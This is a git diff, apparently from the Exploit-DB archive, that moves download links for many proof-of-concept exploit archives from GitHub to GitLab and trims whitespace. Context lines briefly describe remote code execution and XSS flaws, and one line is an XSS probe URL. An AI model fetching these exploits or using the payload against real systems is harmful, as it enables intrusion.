+https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25574-2.zip \ No newline at end of file diff --git a/exploits/multiple/remote/25691.txt b/exploits/multiple/remote/25691.txt index e52faacdf..f702a58fd 100644 --- a/exploits/multiple/remote/25691.txt +++ b/exploits/multiple/remote/25691.txt @@ -4,6 +4,6 @@ Warrior Kings, and Warrior Kings: Battles are vulnerable to a remote format stri This vulnerability allows remote attackers to crash affected game servers. Due to the nature of this vulnerability, it is also likely that attackers may cause arbitrary machine code to be executed in the context of the affected game server. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25691-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25691-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25691-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25691-2.zip \ No newline at end of file diff --git a/exploits/multiple/remote/25708.txt b/exploits/multiple/remote/25708.txt index 1432ea53d..64ff32f27 100644 --- a/exploits/multiple/remote/25708.txt +++ b/exploits/multiple/remote/25708.txt @@ -4,4 +4,4 @@ Terminator 3 : War of the Machines server is prone to a buffer overflow vulnerab Terminator 3: War of the Machines version 1.16 is affected by this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25708.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25708.zip \ No newline at end of file diff --git a/exploits/multiple/remote/25710.txt b/exploits/multiple/remote/25710.txt index d2ece1d25..8d32ed7f6 100644 --- a/exploits/multiple/remote/25710.txt +++ b/exploits/multiple/remote/25710.txt @@ -4,4 +4,4 @@ C'Nedra Network Plug-in is prone to a remotely exploitable buffer overflow vulne This vulnerability could be exploited to execute arbitrary code in the context of the affected software. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25710.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25710.zip \ No newline at end of file diff --git a/exploits/multiple/remote/26210.txt b/exploits/multiple/remote/26210.txt index 9a8bb4d5e..174cc54f3 100644 --- a/exploits/multiple/remote/26210.txt +++ b/exploits/multiple/remote/26210.txt @@ -10,4 +10,4 @@ The fourth issue is a remote denial of service vulnerability. This issue is due These vulnerabilities allow remote attackers to gain administrative access in the affected server application, and to deny further access to the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/26210.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/26210.zip \ No newline at end of file diff --git a/exploits/multiple/remote/28344.txt b/exploits/multiple/remote/28344.txt index 099f25889..6f1ca39e1 100644 --- a/exploits/multiple/remote/28344.txt +++ b/exploits/multiple/remote/28344.txt @@ -6,4 +6,4 @@ This issue allows remote attackers to execute arbitrary code within the context Version 0.7.0, CVS July 30th 2006 and prior versions are vulnerable to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28344.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28344.zip \ No newline at end of file diff --git a/exploits/multiple/remote/28368.txt b/exploits/multiple/remote/28368.txt index 062a1a63a..f837255e2 100644 --- a/exploits/multiple/remote/28368.txt +++ b/exploits/multiple/remote/28368.txt @@ -4,4 +4,4 @@ ArcSoft MMS Composer is affected by multiple vulnerabilities, including buffer-o Successful exploits can allow remote attackers to cause denial-of-service conditions and to execute arbitrary machine code in the context of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28368.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28368.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/30288.txt b/exploits/multiple/remote/30288.txt index f6dc7a70d..2e210ce78 100644 --- a/exploits/multiple/remote/30288.txt +++ b/exploits/multiple/remote/30288.txt @@ -8,4 +8,4 @@ A successful exploit will result in the execution of arbitrary attacker-supplied Adobe Flash Player 9.0.45.0 and earlier, 8.0.34.0 and earlier, and 7.0.69.0 and earlier are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30288.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30288.zip \ No newline at end of file diff --git a/exploits/multiple/remote/30499.txt b/exploits/multiple/remote/30499.txt index 4b83a10cc..2ce3eed86 100644 --- a/exploits/multiple/remote/30499.txt +++ b/exploits/multiple/remote/30499.txt @@ -4,4 +4,4 @@ Babo Violent 2 is prone to four vulnerabilities: a format-string issue and three Successful attacks could allow attackers to execute arbitrary code or crash game servers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30499.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30499.zip \ No newline at end of file diff --git a/exploits/multiple/remote/30507.txt b/exploits/multiple/remote/30507.txt index 911854f3f..ee009b481 100644 --- a/exploits/multiple/remote/30507.txt +++ b/exploits/multiple/remote/30507.txt @@ -6,4 +6,4 @@ These vulnerabilities may be triggered by malicious client requests to games tha NOTE: This BID originally stated that the vulnerabilities were in the rFactor game. New information shows that the gMotor2 game engine and multiple games that use the engine are vulnerable. This BID was updated to reflect this new information. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30507.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30507.zip \ No newline at end of file diff --git a/exploits/multiple/remote/30508.txt b/exploits/multiple/remote/30508.txt index 85e410c03..173b90919 100644 --- a/exploits/multiple/remote/30508.txt +++ b/exploits/multiple/remote/30508.txt @@ -4,4 +4,4 @@ Toribash is prone to multiple remote code-execution and denial-of-service vulner Attackers may exploit these issues to execute arbitrary code in the content of the game server and game client or to deny service to both servers and clients. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30508.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30508.zip \ No newline at end of file diff --git a/exploits/multiple/remote/30521.txt b/exploits/multiple/remote/30521.txt index af863c170..fbd377584 100644 --- a/exploits/multiple/remote/30521.txt +++ b/exploits/multiple/remote/30521.txt @@ -6,5 +6,5 @@ An attacker can exploit these issues to compromise the affected computer, overwr Unreal Commander 0.92 (build 565) and 0.92 (build 573) are vulnerable; prior versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30521-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30521-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30521-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30521-2.zip \ No newline at end of file diff --git a/exploits/multiple/remote/30523.txt b/exploits/multiple/remote/30523.txt index 760cb2db4..13c364cf3 100644 --- a/exploits/multiple/remote/30523.txt +++ b/exploits/multiple/remote/30523.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary code with the privileges o Skulltag 0.97d-beta4.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30523.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30523.zip \ No newline at end of file diff --git a/exploits/multiple/remote/30643.txt b/exploits/multiple/remote/30643.txt index 8a1e2f512..8262d8ebd 100644 --- a/exploits/multiple/remote/30643.txt +++ b/exploits/multiple/remote/30643.txt @@ -6,4 +6,4 @@ An attacker could exploit these issues to execute arbitrary code within the cont These issues affect DropTeam 1.3.3; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30643.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30643.zip \ No newline at end of file diff --git a/exploits/multiple/remote/30850.txt b/exploits/multiple/remote/30850.txt index f73a0a928..0d74bdf18 100644 --- a/exploits/multiple/remote/30850.txt +++ b/exploits/multiple/remote/30850.txt @@ -6,4 +6,4 @@ A successful exploit may allow the attacker to upload malicious files and potent This issue affects versions prior to HTTP File Server 2.2b. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30850.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30850.zip \ No newline at end of file diff --git a/exploits/multiple/remote/30944.txt b/exploits/multiple/remote/30944.txt index 219086bc0..52f804ee1 100644 --- a/exploits/multiple/remote/30944.txt +++ b/exploits/multiple/remote/30944.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to execute arbitrar Feng 0.1.15 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30944.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30944.zip \ No newline at end of file diff --git a/exploits/multiple/remote/31106.txt b/exploits/multiple/remote/31106.txt index faf4177b1..89693da81 100644 --- a/exploits/multiple/remote/31106.txt +++ b/exploits/multiple/remote/31106.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to perform unauthori These issues affect WinComLPD Total 3.0.2.623; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31106.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31106.zip \ No newline at end of file diff --git a/exploits/multiple/remote/31119.txt b/exploits/multiple/remote/31119.txt index 14ac469cf..d5b3c9c72 100644 --- a/exploits/multiple/remote/31119.txt +++ b/exploits/multiple/remote/31119.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to execute arbitrary code, cause denial-of-se These issues affect TinTin++ and WinTin++ 1.97.9; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31119.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31119.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/31918.txt b/exploits/multiple/remote/31918.txt index d9425af17..183a4b0e6 100644 --- a/exploits/multiple/remote/31918.txt +++ b/exploits/multiple/remote/31918.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to obtain sensitive information that may lead t Crysis 1.21 and prior versions are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31918.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31918.zip \ No newline at end of file diff --git a/exploits/multiple/remote/32363.txt b/exploits/multiple/remote/32363.txt index c35c3ef2c..d73d691d6 100644 --- a/exploits/multiple/remote/32363.txt +++ b/exploits/multiple/remote/32363.txt @@ -4,4 +4,4 @@ Unreal Engine is prone to multiple remote format-string vulnerabilities. Attackers can exploit the issues to execute arbitrary code within the context of a client application that uses the vulnerable engine. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32363.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32363.zip \ No newline at end of file diff --git a/exploits/multiple/remote/32762.pl b/exploits/multiple/remote/32762.pl index bc8956313..5ab22c899 100755 --- a/exploits/multiple/remote/32762.pl +++ b/exploits/multiple/remote/32762.pl @@ -175,6 +175,4 @@ chomp($line); } print "\n\n"; close(Userfile); - } - - + } \ No newline at end of file diff --git a/exploits/multiple/remote/32781.txt b/exploits/multiple/remote/32781.txt index d56a37439..d1b20ddc3 100644 --- a/exploits/multiple/remote/32781.txt +++ b/exploits/multiple/remote/32781.txt @@ -6,4 +6,4 @@ Attacker-supplied XML and script code would run in the context of the affected b PyBlosxom 1.4.3 is vulnerable; other versions may also be affected. -http://host/path/%3Ccool%3E?flav=atom +http://host/path/%3Ccool%3E?flav=atom \ No newline at end of file diff --git a/exploits/multiple/remote/32945.txt b/exploits/multiple/remote/32945.txt index b51e0fead..69f91a398 100644 --- a/exploits/multiple/remote/32945.txt +++ b/exploits/multiple/remote/32945.txt @@ -8,4 +8,4 @@ UPDATE (April 22, 2009): Since script files and templates may include script cod Versions prior to 010 Editor 3.0.5 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32945.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32945.zip \ No newline at end of file diff --git a/exploits/multiple/remote/33067.txt b/exploits/multiple/remote/33067.txt index de1ba2b3b..2ae27fd33 100644 --- a/exploits/multiple/remote/33067.txt +++ b/exploits/multiple/remote/33067.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue will allow attackers to compromise the affect Winds3D Viewer 3.5.0.0 and 3.5.0.5 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33067.usr \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33067.usr \ No newline at end of file diff --git a/exploits/multiple/remote/33084.txt b/exploits/multiple/remote/33084.txt index f99b69aa3..04ea4ff5d 100644 --- a/exploits/multiple/remote/33084.txt +++ b/exploits/multiple/remote/33084.txt @@ -12,4 +12,4 @@ The following supported versions are affected: 10.2.0.4 11.1.0.7 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33084.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33084.zip \ No newline at end of file diff --git a/exploits/multiple/remote/33786.txt b/exploits/multiple/remote/33786.txt index c5376857e..1da79f202 100644 --- a/exploits/multiple/remote/33786.txt +++ b/exploits/multiple/remote/33786.txt @@ -6,4 +6,4 @@ Successful exploits may allow an attacker to execute arbitrary code within the c Cafu 9.06 and prior are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33786.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33786.zip \ No newline at end of file diff --git a/exploits/multiple/remote/33802.txt b/exploits/multiple/remote/33802.txt index b76e05370..1b15f19de 100644 --- a/exploits/multiple/remote/33802.txt +++ b/exploits/multiple/remote/33802.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code with the privileges RakNet 3.72 is affected; other versions may be vulnerable as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33802.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33802.zip \ No newline at end of file diff --git a/exploits/multiple/remote/33847.txt b/exploits/multiple/remote/33847.txt index f2d5b4ac0..f08b6d855 100644 --- a/exploits/multiple/remote/33847.txt +++ b/exploits/multiple/remote/33847.txt @@ -6,4 +6,4 @@ Successful exploits can allow remote attackers to execute arbitrary machine code netkar-PRO 1.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33847.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33847.zip \ No newline at end of file diff --git a/exploits/multiple/remote/33907.txt b/exploits/multiple/remote/33907.txt index 782ddf6d9..6b4a32719 100644 --- a/exploits/multiple/remote/33907.txt +++ b/exploits/multiple/remote/33907.txt @@ -35,4 +35,4 @@ MMr. Than@`.................MMr. Rich=`.................MMr. Prak>`............. MMrs. Geeen................. Trimmed.... -Current vulnerability is checked and verified with zk5000 hardware model, possibly all other versions would be vulnerable. +Current vulnerability is checked and verified with zk5000 hardware model, possibly all other versions would be vulnerable. \ No newline at end of file diff --git a/exploits/multiple/remote/34271.txt b/exploits/multiple/remote/34271.txt index 628f54768..f1e19a16c 100644 --- a/exploits/multiple/remote/34271.txt +++ b/exploits/multiple/remote/34271.txt @@ -9,4 +9,4 @@ The following applications include the vulnerable engine: Enemy Territory: Quake Wars 1.5.12642.33243 and prior Wolfenstein 1.3.344272 and prior -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34271.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34271.zip \ No newline at end of file diff --git a/exploits/multiple/remote/349.txt b/exploits/multiple/remote/349.txt index 5e2b02173..15a0674f5 100644 --- a/exploits/multiple/remote/349.txt +++ b/exploits/multiple/remote/349.txt @@ -1,3 +1,3 @@ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/349.tgz (x2.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/349.tgz (x2.tgz) # milw0rm.com [2002-05-01] \ No newline at end of file diff --git a/exploits/multiple/remote/35062.txt b/exploits/multiple/remote/35062.txt index 132a97fbc..5012efeef 100644 --- a/exploits/multiple/remote/35062.txt +++ b/exploits/multiple/remote/35062.txt @@ -6,4 +6,4 @@ Successful exploits may allow an attacker to execute arbitrary code in the conte The issue affects lm_tcp <= 9.0.0 0248.18.0.0; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35062.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35062.zip \ No newline at end of file diff --git a/exploits/multiple/remote/35352.rb b/exploits/multiple/remote/35352.rb index 81ba09293..7521e89c8 100755 --- a/exploits/multiple/remote/35352.rb +++ b/exploits/multiple/remote/35352.rb @@ -75,15 +75,4 @@ Request distribution per hour 0:00 ? 7 hits/day ? ��������������������������������� 1:00 ? 0 hits/day ? ... -=end - - - - - - - - - - - +=end \ No newline at end of file diff --git a/exploits/multiple/remote/35495.txt b/exploits/multiple/remote/35495.txt index 4d4f02b71..726f966ee 100644 --- a/exploits/multiple/remote/35495.txt +++ b/exploits/multiple/remote/35495.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code and gain access t Advantech/BroadWin SCADA WebAccess 7.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35495.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35495.zip \ No newline at end of file diff --git a/exploits/multiple/remote/37336.txt b/exploits/multiple/remote/37336.txt index 8276a2671..c90421770 100644 --- a/exploits/multiple/remote/37336.txt +++ b/exploits/multiple/remote/37336.txt @@ -119,7 +119,7 @@ Project Zero Bug For those interested, the sample exploit can be found here: https://code.google.com/p/google-security-research/issues/detail?id=455 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37336.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37336.tar.gz Disclosure Timeline diff --git a/exploits/multiple/remote/37851.txt b/exploits/multiple/remote/37851.txt index 673b65b98..7210b2d21 100644 --- a/exploits/multiple/remote/37851.txt +++ b/exploits/multiple/remote/37851.txt @@ -10,4 +10,4 @@ An instance of ActionScript's Sound class allows for loading and extracting for --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37851.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37851.zip \ No newline at end of file diff --git a/exploits/multiple/remote/39631.txt b/exploits/multiple/remote/39631.txt index 7b7d822d1..a954f08b1 100644 --- a/exploits/multiple/remote/39631.txt +++ b/exploits/multiple/remote/39631.txt @@ -24,4 +24,4 @@ The bug is an uninitialized variable in the fix to an ActionScript 2 use-after-f Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39631.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39631.zip \ No newline at end of file diff --git a/exploits/multiple/remote/40382.txt b/exploits/multiple/remote/40382.txt index f0f9e4eee..319c0068f 100644 --- a/exploits/multiple/remote/40382.txt +++ b/exploits/multiple/remote/40382.txt @@ -4,8 +4,8 @@ Apache Mina 2.0.13 uses the OGNL library in the “IoSessionFinder” class. Its **PoC.zip** https://drive.google.com/open?id=0ByB_ASBOdiURbVBHMjFxeldmSDg -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40382-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40382-1.zip **MinaJMXConsole.zip** https://drive.google.com/file/d/0ByB_ASBOdiURQjVCTlYtREotVnM/view -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40382-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40382-2.zip \ No newline at end of file diff --git a/exploits/multiple/remote/41740.txt b/exploits/multiple/remote/41740.txt index ae02a2625..889abcd47 100644 --- a/exploits/multiple/remote/41740.txt +++ b/exploits/multiple/remote/41740.txt @@ -91,4 +91,4 @@ To reproduce: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41740.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41740.zip \ No newline at end of file diff --git a/exploits/multiple/remote/42885.rb b/exploits/multiple/remote/42885.rb index fbe7ed70c..f3ec0f741 100755 --- a/exploits/multiple/remote/42885.rb +++ b/exploits/multiple/remote/42885.rb @@ -181,5 +181,4 @@ james@bloop:~/.msf4/loot$ cat 20170927110456_default_192.168.1.2_laquis.file_677 # localhost name resolution is handled within DNS itself. # -# - +# \ No newline at end of file diff --git a/exploits/multiple/remote/42965.rb b/exploits/multiple/remote/42965.rb index d7963395b..ab81726b0 100755 --- a/exploits/multiple/remote/42965.rb +++ b/exploits/multiple/remote/42965.rb @@ -253,4 +253,4 @@ class MetasploitModule < Msf::Exploit::Remote end end end -end +end \ No newline at end of file diff --git a/exploits/multiple/remote/43665.md b/exploits/multiple/remote/43665.md index 50249e009..7d8359469 100644 --- a/exploits/multiple/remote/43665.md +++ b/exploits/multiple/remote/43665.md @@ -62,4 +62,4 @@ EDB Note ~ https://bugs.chromium.org/p/project-zero/issues/detail?id=1447 EDB Note ~ https://github.com/transmission/transmission/pull/468 EDB Note ~ https://github.com/taviso/rbndr/tree/a189ffd9447ba78aa2702c5649d853b6fb612e3b -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43665.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43665.zip \ No newline at end of file diff --git a/exploits/multiple/remote/44584.txt b/exploits/multiple/remote/44584.txt index aaeb4aad7..f4b246a3a 100644 --- a/exploits/multiple/remote/44584.txt +++ b/exploits/multiple/remote/44584.txt @@ -71,4 +71,4 @@ Note that issue_808192.html is a template - it requires server.py to do a versio Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44584.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44584.zip \ No newline at end of file diff --git a/exploits/multiple/remote/45272.txt b/exploits/multiple/remote/45272.txt index 9af49909b..7f148a109 100644 --- a/exploits/multiple/remote/45272.txt +++ b/exploits/multiple/remote/45272.txt @@ -25,4 +25,4 @@ npm start Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45272.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45272.zip \ No newline at end of file diff --git a/exploits/multiple/remote/4877.txt b/exploits/multiple/remote/4877.txt index cba9bccee..3e9de092b 100644 --- a/exploits/multiple/remote/4877.txt +++ b/exploits/multiple/remote/4877.txt @@ -70,7 +70,7 @@ vulnerability are in the fantasy of the attacker... http://aluigi.org/poc/sapone.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4877.zip (2008-sapone.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4877.zip (2008-sapone.zip) ####################################################################### diff --git a/exploits/multiple/remote/5790.txt b/exploits/multiple/remote/5790.txt index 662884d46..3a1a59eb7 100644 --- a/exploits/multiple/remote/5790.txt +++ b/exploits/multiple/remote/5790.txt @@ -9,6 +9,6 @@ # # ############################################################################# -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5790.tgz (2008-snmpv3_exp.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5790.tgz (2008-snmpv3_exp.tgz) # milw0rm.com [2008-06-12] \ No newline at end of file diff --git a/exploits/multiple/remote/6236.txt b/exploits/multiple/remote/6236.txt index c87a2e535..cb73c471d 100644 --- a/exploits/multiple/remote/6236.txt +++ b/exploits/multiple/remote/6236.txt @@ -36,6 +36,6 @@ So, if you have a GigE lan, any trojaned machine can poison your DNS during one original source: http://tservice.net.ru/~s0mbre/blog/2008/08/08/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6236.tgz (2008-dns-bind.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6236.tgz (2008-dns-bind.tgz) # milw0rm.com [2008-08-13] \ No newline at end of file diff --git a/exploits/multiple/webapps/10209.txt b/exploits/multiple/webapps/10209.txt index 771afad27..7326e260b 100644 --- a/exploits/multiple/webapps/10209.txt +++ b/exploits/multiple/webapps/10209.txt @@ -23,4 +23,4 @@ Andrea Fabrizi http://www.andreafabrizi.it -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10209.tar.gz (2009-11-22-EverFocus_Edsr_Exploit.tar.gz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10209.tar.gz (2009-11-22-EverFocus_Edsr_Exploit.tar.gz) \ No newline at end of file diff --git a/exploits/multiple/webapps/11184.txt b/exploits/multiple/webapps/11184.txt index f3136a761..6a0997c7e 100644 --- a/exploits/multiple/webapps/11184.txt +++ b/exploits/multiple/webapps/11184.txt @@ -87,4 +87,4 @@ For more information, please visit www.cybsec.com ====================================================== Download: ====================================================== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11184.pdf (CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11184.pdf (CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf) \ No newline at end of file diff --git a/exploits/multiple/webapps/11186.txt b/exploits/multiple/webapps/11186.txt index 43cb71f6b..8223cbe26 100644 --- a/exploits/multiple/webapps/11186.txt +++ b/exploits/multiple/webapps/11186.txt @@ -94,4 +94,4 @@ For more information, please visit www.cybsec.com =========================================================================== Download: =========================================================================== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11186.pdf (CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11186.pdf (CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf) \ No newline at end of file diff --git a/exploits/multiple/webapps/11187.txt b/exploits/multiple/webapps/11187.txt index 073f6106e..dd2c307f0 100644 --- a/exploits/multiple/webapps/11187.txt +++ b/exploits/multiple/webapps/11187.txt @@ -85,4 +85,4 @@ For more information, please visit www.cybsec.com =========================================================================== Download: =========================================================================== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11187.pdf (CYBSEC-Advisory2010-0101-FreePBX_2_5_x_Information_disclosure.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11187.pdf (CYBSEC-Advisory2010-0101-FreePBX_2_5_x_Information_disclosure.pdf) \ No newline at end of file diff --git a/exploits/multiple/webapps/11211.txt b/exploits/multiple/webapps/11211.txt index 99dd4ad7b..eecac497e 100644 --- a/exploits/multiple/webapps/11211.txt +++ b/exploits/multiple/webapps/11211.txt @@ -148,4 +148,4 @@ the world. =========================================== The PDF version can be downloaded here: =========================================== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11211.pdf (cpanel_http_response_splitting_vulnerability.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11211.pdf (cpanel_http_response_splitting_vulnerability.pdf) \ No newline at end of file diff --git a/exploits/multiple/webapps/12730.txt b/exploits/multiple/webapps/12730.txt index a63a36bf2..9105ff607 100644 --- a/exploits/multiple/webapps/12730.txt +++ b/exploits/multiple/webapps/12730.txt @@ -47,6 +47,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/multiple/webapps/14001.txt b/exploits/multiple/webapps/14001.txt index c04909384..dc8a2f72d 100644 --- a/exploits/multiple/webapps/14001.txt +++ 